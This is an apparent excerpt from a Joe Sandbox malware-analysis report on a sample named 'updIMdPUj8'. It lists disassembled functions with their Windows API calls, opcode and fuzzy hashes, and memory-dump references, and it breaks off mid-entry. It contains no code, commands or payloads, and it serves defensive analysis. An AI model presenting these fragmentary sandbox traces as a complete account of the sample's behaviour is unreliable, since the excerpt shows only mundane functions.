                                                                                                                                                                          • Opcode ID: ecc2e0d6d8b442fd8fec86f125ea021b4943c9a47e9ec8ebd0537de35d206006
                                                                                                                                                                          • Instruction ID: f0a5620e2cfbf7b28bac6ecae1f1c73a881dcedc930801ffb6e05e5af83c0264
                                                                                                                                                                          • Opcode Fuzzy Hash: ecc2e0d6d8b442fd8fec86f125ea021b4943c9a47e9ec8ebd0537de35d206006
                                                                                                                                                                          • Instruction Fuzzy Hash: F5E09231140319ABEB025F60EC85FD937DCEB087C2F4840A1B948D2190EF61DE84DA50
                                                                                                                                                                          Function 00B3AC7C Relevance: 3.0, APIs: 2, Instructions: 26COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          • GdiplusShutdown.GDIPLUS(?,?,?,?,00B52641,000000FF), ref: 00B3ACB0
                                                                                                                                                                          • CoUninitialize.COMBASE(?,?,?,?,00B52641,000000FF), ref: 00B3ACB5
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1679167304.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1679146465.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679202560.0000000000B53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B65000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B82000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679306317.0000000000B83000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_b20000_updIMdPUj8.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: GdiplusShutdownUninitialize
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 3856339756-0
                                                                                                                                                                          • Opcode ID: 0bbca2def74686b4d7fab8142760dfbe2b7dba8eac972ab489f50649ca37c173
                                                                                                                                                                          • Instruction ID: 15cc3e4b2f649a19c2fbcf6a4d0e698d85f2564347f6396d0159b409a854aec6
                                                                                                                                                                          • Opcode Fuzzy Hash: 0bbca2def74686b4d7fab8142760dfbe2b7dba8eac972ab489f50649ca37c173
                                                                                                                                                                          • Instruction Fuzzy Hash: 91E03072544650EBCA01AB59DC46B45FBE8FB48E20F1042A6E416D37A0CF74A800CA90
                                                                                                                                                                          Function 00B2A243 Relevance: 3.0, APIs: 2, Instructions: 25COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          • GetFileAttributesW.KERNELBASE(?,?,?,00B2A23A,?,00B2755C,?,?,?,?), ref: 00B2A254
                                                                                                                                                                            • Part of subcall function 00B2BB03: _wcslen.LIBCMT ref: 00B2BB27
                                                                                                                                                                          • GetFileAttributesW.KERNELBASE(?,?,?,00000800,?,00B2A23A,?,00B2755C,?,?,?,?), ref: 00B2A280
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1679167304.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1679146465.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679202560.0000000000B53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B65000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B82000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679306317.0000000000B83000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_b20000_updIMdPUj8.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: AttributesFile$_wcslen
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 2673547680-0
                                                                                                                                                                          • Opcode ID: d4a7ee7252bdebd4792fe7d77aa6835373ca564f1afb17ca3b50857be0f2a54c
                                                                                                                                                                          • Instruction ID: 3c9a750e7bf7dd4aa8cfa127e82d471255d76a72bff9ead382afd599abd917d4
                                                                                                                                                                          • Opcode Fuzzy Hash: d4a7ee7252bdebd4792fe7d77aa6835373ca564f1afb17ca3b50857be0f2a54c
                                                                                                                                                                          • Instruction Fuzzy Hash: 55E012355002249BCB51AB64DC09BD9B7D8EB187E2F0446E1FD59E32D4DB71DE44CAA0
                                                                                                                                                                          Function 00B3DEC2 Relevance: 3.0, APIs: 2, Instructions: 25COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          • _swprintf.LIBCMT ref: 00B3DEEC
                                                                                                                                                                            • Part of subcall function 00B24092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00B240A5
                                                                                                                                                                          • SetDlgItemTextW.USER32(00000065,?), ref: 00B3DF03
                                                                                                                                                                            • Part of subcall function 00B3B568: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 00B3B579
                                                                                                                                                                            • Part of subcall function 00B3B568: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00B3B58A
                                                                                                                                                                            • Part of subcall function 00B3B568: IsDialogMessageW.USER32(0001046A,?), ref: 00B3B59E
                                                                                                                                                                            • Part of subcall function 00B3B568: TranslateMessage.USER32(?), ref: 00B3B5AC
                                                                                                                                                                            • Part of subcall function 00B3B568: DispatchMessageW.USER32(?), ref: 00B3B5B6
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1679167304.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1679146465.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679202560.0000000000B53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B65000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B82000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679306317.0000000000B83000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_b20000_updIMdPUj8.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Message$DialogDispatchItemPeekTextTranslate__vswprintf_c_l_swprintf
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 2718869927-0
                                                                                                                                                                          • Opcode ID: 78e09a405215073c0a024c923efcfdc5b74446d0b6099f4c7f5b51146ceaf630
                                                                                                                                                                          • Instruction ID: 4eac3cd7d2b99f54c1899439e28b41058c3b4479f1bb7b61fa44bf6c07089742
                                                                                                                                                                          • Opcode Fuzzy Hash: 78e09a405215073c0a024c923efcfdc5b74446d0b6099f4c7f5b51146ceaf630
                                                                                                                                                                          • Instruction Fuzzy Hash: 3AE092B241025826DF02AB61DC0AF9E3BEC9B05B85F440891B204EB1F2DE78EA508761
                                                                                                                                                                          Function 00B3081B Relevance: 3.0, APIs: 2, Instructions: 24libraryCOMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          • GetSystemDirectoryW.KERNEL32(?,00000800), ref: 00B30836
                                                                                                                                                                          • LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,00B2F2D8,Crypt32.dll,00000000,00B2F35C,?,?,00B2F33E,?,?,?), ref: 00B30858
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1679167304.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1679146465.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679202560.0000000000B53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B65000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B82000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679306317.0000000000B83000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_b20000_updIMdPUj8.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: DirectoryLibraryLoadSystem
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 1175261203-0
                                                                                                                                                                          • Opcode ID: 4a603263765c43ad4a72f35a37443b7680e1987916113c9b7774f316cf3b6f30
                                                                                                                                                                          • Instruction ID: d6609b425fbfcc7833c6b667015ed2e1182e0834bd7bc4d3646d8c405135b940
                                                                                                                                                                          • Opcode Fuzzy Hash: 4a603263765c43ad4a72f35a37443b7680e1987916113c9b7774f316cf3b6f30
                                                                                                                                                                          • Instruction Fuzzy Hash: C5E048764002286BDB11A795DC05FDA77ECEF097D2F0400E5B649D3144DA74DA84CBB0
                                                                                                                                                                          Function 00B3A3B9 Relevance: 3.0, APIs: 2, Instructions: 23windowCOMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          • GdipCreateBitmapFromStreamICM.GDIPLUS(?,?), ref: 00B3A3DA
                                                                                                                                                                          • GdipCreateBitmapFromStream.GDIPLUS(?,?), ref: 00B3A3E1
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1679167304.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1679146465.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679202560.0000000000B53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B65000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B82000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679306317.0000000000B83000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_b20000_updIMdPUj8.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: BitmapCreateFromGdipStream
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 1918208029-0
                                                                                                                                                                          • Opcode ID: 16b671abd284a6631488a479d969ae66f27dfa01c21fadc269851a988a8661a5
                                                                                                                                                                          • Instruction ID: 758e7e10d7532a56be8433857b88f19c0061703750e5db52e24174068c99ee2a
                                                                                                                                                                          • Opcode Fuzzy Hash: 16b671abd284a6631488a479d969ae66f27dfa01c21fadc269851a988a8661a5
                                                                                                                                                                          • Instruction Fuzzy Hash: AAE0ED72500218EBCB10DF59C541B99BBE8EB04365F30849AA89693241E374AE44DB91
                                                                                                                                                                          Function 00B42B8C Relevance: 3.0, APIs: 2, Instructions: 19COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00B42BAA
                                                                                                                                                                          • ___vcrt_uninitialize_ptd.LIBVCRUNTIME ref: 00B42BB5
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1679167304.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1679146465.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679202560.0000000000B53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B65000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B82000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679306317.0000000000B83000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_b20000_updIMdPUj8.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Value___vcrt____vcrt_uninitialize_ptd
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 1660781231-0
                                                                                                                                                                          • Opcode ID: 68e1720b05b61aea33044a7be07aecb4909e0f67226e520423582347ec402486
                                                                                                                                                                          • Instruction ID: 0ec7b2d28dbe53cbfc4b9cb533b9b2d5eb26b99c36b12b714fbb3b1364243e03
                                                                                                                                                                          • Opcode Fuzzy Hash: 68e1720b05b61aea33044a7be07aecb4909e0f67226e520423582347ec402486
                                                                                                                                                                          • Instruction Fuzzy Hash: 1DD022385A430018AC183F703B035483BC6ED41F75BF002EAF83086CE2EE10C340B111
                                                                                                                                                                          Function 00B212F1 Relevance: 3.0, APIs: 2, Instructions: 11COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1679167304.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1679146465.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679202560.0000000000B53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B65000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B82000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679306317.0000000000B83000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_b20000_updIMdPUj8.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: ItemShowWindow
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 3351165006-0
                                                                                                                                                                          • Opcode ID: 5bf9d982141c72de194cf084427030bb168be79111552afe25e98a65730b7fa4
                                                                                                                                                                          • Instruction ID: b05596f5512c8d897a050997bed5e6e3bcf0dc3a53b1eca4df23a78b55b09c09
                                                                                                                                                                          • Opcode Fuzzy Hash: 5bf9d982141c72de194cf084427030bb168be79111552afe25e98a65730b7fa4
                                                                                                                                                                          • Instruction Fuzzy Hash: BCC0123205C200BECB012BB4DC0DC2BBBE8ABA5F12F04C908B0A5D2070EA38C150DB11
                                                                                                                                                                          Function 00B21A04 Relevance: 1.8, APIs: 1, Instructions: 312COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1679167304.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1679146465.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679202560.0000000000B53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B65000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B82000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679306317.0000000000B83000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_b20000_updIMdPUj8.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: H_prolog
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 3519838083-0
                                                                                                                                                                          • Opcode ID: e2cb3d42316293d50d1d9887cb0b850ab64cd00abac1c76acbc2d2fec566cc04
                                                                                                                                                                          • Instruction ID: 78ad7b7634c68b3145456634cbb4d72a6c5b998d4ea304e8d98bf5c7fc212db3
                                                                                                                                                                          • Opcode Fuzzy Hash: e2cb3d42316293d50d1d9887cb0b850ab64cd00abac1c76acbc2d2fec566cc04
                                                                                                                                                                          • Instruction Fuzzy Hash: D4C1B030A002649BEF15CF6CD498BA97BE5EF29350F1809F9EC499F386DB319944CB61
                                                                                                                                                                          Function 00B23BBA Relevance: 1.7, APIs: 1, Instructions: 177COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1679167304.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1679146465.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679202560.0000000000B53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B65000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B82000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679306317.0000000000B83000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_b20000_updIMdPUj8.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: H_prolog
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 3519838083-0
                                                                                                                                                                          • Opcode ID: ed5b3cb926f57f445c81117f142ab9aaf38485962d5bf01c4fde9b0af917ac01
                                                                                                                                                                          • Instruction ID: b15ffd5a4aba7682b0084f71621e8bf779b50a6e7748c7047c1317d9e9790f6b
                                                                                                                                                                          • Opcode Fuzzy Hash: ed5b3cb926f57f445c81117f142ab9aaf38485962d5bf01c4fde9b0af917ac01
                                                                                                                                                                          • Instruction Fuzzy Hash: 2471E271500B949ECB35EB74D8919E7B7E9EF14700F400DAEE2AF83241DA366A88CF11
                                                                                                                                                                          Function 00B28284 Relevance: 1.6, APIs: 1, Instructions: 114COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          • __EH_prolog.LIBCMT ref: 00B28289
                                                                                                                                                                            • Part of subcall function 00B213DC: __EH_prolog.LIBCMT ref: 00B213E1
                                                                                                                                                                            • Part of subcall function 00B2A56D: FindClose.KERNELBASE(00000000,000000FF,?,?), ref: 00B2A598
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1679167304.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1679146465.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679202560.0000000000B53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B65000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B82000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679306317.0000000000B83000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_b20000_updIMdPUj8.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: H_prolog$CloseFind
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 2506663941-0
                                                                                                                                                                          • Opcode ID: ad1938963da4800fcf7f5357d2dbf26313aeb926ea0f6780455b8e5aab918ede
                                                                                                                                                                          • Instruction ID: 89bc8de2e1418a99bc0efa0eb747f40f7aaaecfc6442abd8f66649d563a075fc
                                                                                                                                                                          • Opcode Fuzzy Hash: ad1938963da4800fcf7f5357d2dbf26313aeb926ea0f6780455b8e5aab918ede
                                                                                                                                                                          • Instruction Fuzzy Hash: A241C5719056689ADB20EB60DC55AEAB3E8EF10304F0404EBE09E97083EB746EC5CB10
                                                                                                                                                                          Function 00B213E1 Relevance: 1.6, APIs: 1, Instructions: 97COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          • __EH_prolog.LIBCMT ref: 00B213E1
                                                                                                                                                                            • Part of subcall function 00B25E37: __EH_prolog.LIBCMT ref: 00B25E3C
                                                                                                                                                                            • Part of subcall function 00B2CE40: __EH_prolog.LIBCMT ref: 00B2CE45
                                                                                                                                                                            • Part of subcall function 00B2B505: __EH_prolog.LIBCMT ref: 00B2B50A
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1679167304.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1679146465.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679202560.0000000000B53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B65000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B82000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679306317.0000000000B83000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_b20000_updIMdPUj8.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: H_prolog
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 3519838083-0
                                                                                                                                                                          • Opcode ID: 8f1aeec501e947ef1c41576e72a7f65750ce169eedd646e0353b63ab04e12696
                                                                                                                                                                          • Instruction ID: 43130d0ade60bea25fd73818a630df2aa52aa0364dd4df35d78bc4b53485700c
                                                                                                                                                                          • Opcode Fuzzy Hash: 8f1aeec501e947ef1c41576e72a7f65750ce169eedd646e0353b63ab04e12696
                                                                                                                                                                          • Instruction Fuzzy Hash: 3B413BB0905B419EE724DF798885AE6FBE5BF29300F50496EE5FE83282CB356654CB10
                                                                                                                                                                          Function 00B213DC Relevance: 1.6, APIs: 1, Instructions: 95COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          • __EH_prolog.LIBCMT ref: 00B213E1
                                                                                                                                                                            • Part of subcall function 00B25E37: __EH_prolog.LIBCMT ref: 00B25E3C
                                                                                                                                                                            • Part of subcall function 00B2CE40: __EH_prolog.LIBCMT ref: 00B2CE45
                                                                                                                                                                            • Part of subcall function 00B2B505: __EH_prolog.LIBCMT ref: 00B2B50A
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1679167304.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1679146465.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679202560.0000000000B53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B65000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B82000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679306317.0000000000B83000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_b20000_updIMdPUj8.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: H_prolog
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 3519838083-0
                                                                                                                                                                          • Opcode ID: d58a07a4193f2270e8afcdc4fe3f3343569a9542c9595a0335d71e748bb6bedc
                                                                                                                                                                          • Instruction ID: 6a4421b7f2e3c330162c1817f48c17b14dc75b5b8cb3dee8596a09234e898d80
                                                                                                                                                                          • Opcode Fuzzy Hash: d58a07a4193f2270e8afcdc4fe3f3343569a9542c9595a0335d71e748bb6bedc
                                                                                                                                                                          • Instruction Fuzzy Hash: F5413AB0905B409EE724DF798885AE6FBE5FF29300F5049AED5FE83282CB356654CB11
                                                                                                                                                                          Function 00B3B093 Relevance: 1.6, APIs: 1, Instructions: 83COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          • __EH_prolog.LIBCMT ref: 00B3B098
                                                                                                                                                                            • Part of subcall function 00B213DC: __EH_prolog.LIBCMT ref: 00B213E1
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1679167304.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1679146465.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679202560.0000000000B53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B65000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B82000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679306317.0000000000B83000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_b20000_updIMdPUj8.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: H_prolog
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 3519838083-0
                                                                                                                                                                          • Opcode ID: 5cdb822226d095346558b874d9f02b4141bb483eff5165fb3a50a3a767737d92
                                                                                                                                                                          • Instruction ID: 6ff890e61d311638e28868fc2ff8158510d0e86033d3e73693638d6c587e7ab4
                                                                                                                                                                          • Opcode Fuzzy Hash: 5cdb822226d095346558b874d9f02b4141bb483eff5165fb3a50a3a767737d92
                                                                                                                                                                          • Instruction Fuzzy Hash: 3B319C75C11259AACF15DF68D891AEEBBF4AF19300F2044EEE409B3242D735AF04CB61
                                                                                                                                                                          Function 00B4AC98 Relevance: 1.6, APIs: 1, Instructions: 65libraryloaderCOMMONLIBRARYCODE
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,?), ref: 00B4ACF8
                                                                                                                                                                          Memory Dump Source
